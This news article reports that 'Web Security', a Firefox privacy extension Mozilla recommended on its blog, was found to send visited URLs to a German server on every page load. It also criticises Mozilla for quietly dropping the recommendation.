Mozilla recommended privacy extension had "phone-home" feature
A browser extension for the Firefox web browser that Mozilla recommended on its official Firefox blog as one of the extensions to make the "Firefox browser a privacy superpower" had phone-home functionality baked into the extension that would submit the current URL and previously visited URLs to a server in Germany on every website load.
Web Security, the name of the add-on, claims to protect users actively "from malware, tampered websites or phishing sites". The extension has more than 223,000 users according to Mozilla AMO and a rating of 3.7 out of 5.
Mozilla wrote on the official site:
Web Security is a sophisticated browser add-on that uses an extensive database to prevent websites from harming your computer or obtaining your sensitive data. Users are often lured to open counterfeit websites of banks, by convincing emails. The Web Security extension will help you detect these counterfeit sites so that you will not be decoyed to enter your sensitive information where it is not safe.
The organization removed the recommendation from the official blog post after allegations were made that the extension transmitted data to a server in Germany on every connect.
Mike Kuketz published an analysis on his German blog. The extension Web Security transmits encrypted information over an insecure connection whenever a domain is visited in the browser.
A quick check with the network analyzer Wireshark confirmed the finding. Web Security communicates with a server IP address whenever a new page is loaded in the Firefox browser the extension is installed in.
The data is encrypted; interested users find the function in include/background.js when they extract the extension and they will notice that it submits visited URLs to the server.
When the user opens the pages, used by Web Security, the following information gets processed to assure the successful operation of Web Security: the web pages that the user opens or the operating web server, the name of the internet service provider of the user and the website from which the user came from and the sub-pages the user opened.
The main issue for Firefox users is not that a privacy extension submits information to a server on every visit; that is bad but it has happened in the past and it will continue to happen as extensions are not reviewed manually anymore before they are published on AMO.
The main issue is that Mozilla recommended the extension on the official company blog as a privacy enhancing extension. The article still states that the collection includes 14 privacy extensions while only 13 are listed due to the removal of Web Security from the listing.
When Mozilla noticed the error in judgement, it removed the recommendation but did not update the article to inform users about the removal.
The blog post has no author attached to it and it is unclear who published the recommendations as no author is listed on the site.
Now You: What is your take?Advertisement